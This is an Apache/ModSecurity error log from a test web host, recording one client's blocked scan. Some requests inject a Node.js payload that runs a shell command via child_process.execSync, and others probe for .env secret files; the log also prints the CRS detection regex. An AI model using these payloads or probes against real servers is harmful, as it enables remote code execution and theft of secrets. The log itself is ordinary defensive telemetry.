[Tue Mar 03 00:27:53.008389 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aaYc-XKpPFQwL8r802j_dQAAAAI"]
[Tue Mar 03 00:27:53.008550 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aaYc-XKpPFQwL8r802j_dQAAAAI"]
[Tue Mar 03 00:27:53.063190 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aaYc-XKpPFQwL8r802j_dgAAAAI"]
[Tue Mar 03 00:27:53.063777 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aaYc-XKpPFQwL8r802j_dgAAAAI"]
[Tue Mar 03 00:27:53.063960 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aaYc-XKpPFQwL8r802j_dgAAAAI"]
[Tue Mar 03 00:27:53.093686 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aaYc-XKpPFQwL8r802j_dwAAAAI"]
[Tue Mar 03 00:27:53.094192 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aaYc-XKpPFQwL8r802j_dwAAAAI"]
[Tue Mar 03 00:27:53.094397 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aaYc-XKpPFQwL8r802j_dwAAAAI"]
[Tue Mar 03 00:27:53.148042 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aaYc-XKpPFQwL8r802j_eAAAAAI"]
[Tue Mar 03 00:27:53.148575 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aaYc-XKpPFQwL8r802j_eAAAAAI"]
[Tue Mar 03 00:27:53.148764 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aaYc-XKpPFQwL8r802j_eAAAAAI"]
[Tue Mar 03 00:27:53.184648 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aaYc-XKpPFQwL8r802j_eQAAAAI"]
[Tue Mar 03 00:27:53.185176 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aaYc-XKpPFQwL8r802j_eQAAAAI"]
[Tue Mar 03 00:27:53.185360 2026] [:error] [pid 2439851] [client 195.178.110.33:47362] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aaYc-XKpPFQwL8r802j_eQAAAAI"]
[Tue Mar 03 00:27:54.056771 2026] [:error] [pid 2439852] [client 195.178.110.33:47366] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aaYc-uruS4pGkRBADB1TmAAAAAM"]
[Tue Mar 03 00:27:54.057311 2026] [:error] [pid 2439852] [client 195.178.110.33:47366] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aaYc-uruS4pGkRBADB1TmAAAAAM"]
[Tue Mar 03 00:27:54.057503 2026] [:error] [pid 2439852] [client 195.178.110.33:47366] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aaYc-uruS4pGkRBADB1TmAAAAAM"]
[Tue Mar 03 00:27:54.098858 2026] [:error] [pid 2439852] [client 195.178.110.33:47366] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aaYc-uruS4pGkRBADB1TmQAAAAM"]
[Tue Mar 03 00:27:54.099481 2026] [:error] [pid 2439852] [client 195.178.110.33:47366] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aaYc-uruS4pGkRBADB1TmQAAAAM"]
[Tue Mar 03 00:27:54.099666 2026] [:error] [pid 2439852] [client 195.178.110.33:47366] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aaYc-uruS4pGkRBADB1TmQAAAAM"]
[Tue Mar 03 00:27:57.241281 2026] [:error] [pid 2439850] [client 195.178.110.33:41762] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:param. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:param: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo \\x5c\\x5c'VULN_TEST\\x5c\\x5c'\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aaYc_Yr6Yylb1b_2S0ZRwQAAAAA"]
[Tue Mar 03 00:27:57.241836 2026] [:error] [pid 2439850] [client 195.178.110.33:41762] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aaYc_Yr6Yylb1b_2S0ZRwQAAAAA"]
[Tue Mar 03 00:27:57.242044 2026] [:error] [pid 2439850] [client 195.178.110.33:41762] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aaYc_Yr6Yylb1b_2S0ZRwQAAAAA"]
[Tue Mar 03 00:28:28.401936 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwQAAAAk"]
[Tue Mar 03 00:28:28.402180 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwQAAAAk"]
[Tue Mar 03 00:28:28.402407 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwQAAAAk"]
[Tue Mar 03 00:28:28.490856 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwgAAAAk"]
[Tue Mar 03 00:28:28.491095 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwgAAAAk"]
[Tue Mar 03 00:28:28.491279 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwgAAAAk"]
[Tue Mar 03 00:28:28.581812 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwwAAAAk"]
[Tue Mar 03 00:28:28.582057 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwwAAAAk"]
[Tue Mar 03 00:28:28.582236 2026] [:error] [pid 2440213] [client 195.178.110.33:41442] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aaYdHIg_zTJdo2cvv7PBwwAAAAk"]
[Tue Mar 03 00:28:29.420915 2026] [authz_core:error] [pid 2439854] [client 195.178.110.33:56616] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue Mar 03 00:28:29.515965 2026] [authz_core:error] [pid 2439854] [client 195.178.110.33:56616] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Tue Mar 03 00:28:29.607192 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aaYdHTmDqvvg871HbIU9jgAAAAY"]
[Tue Mar 03 00:28:29.607442 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aaYdHTmDqvvg871HbIU9jgAAAAY"]
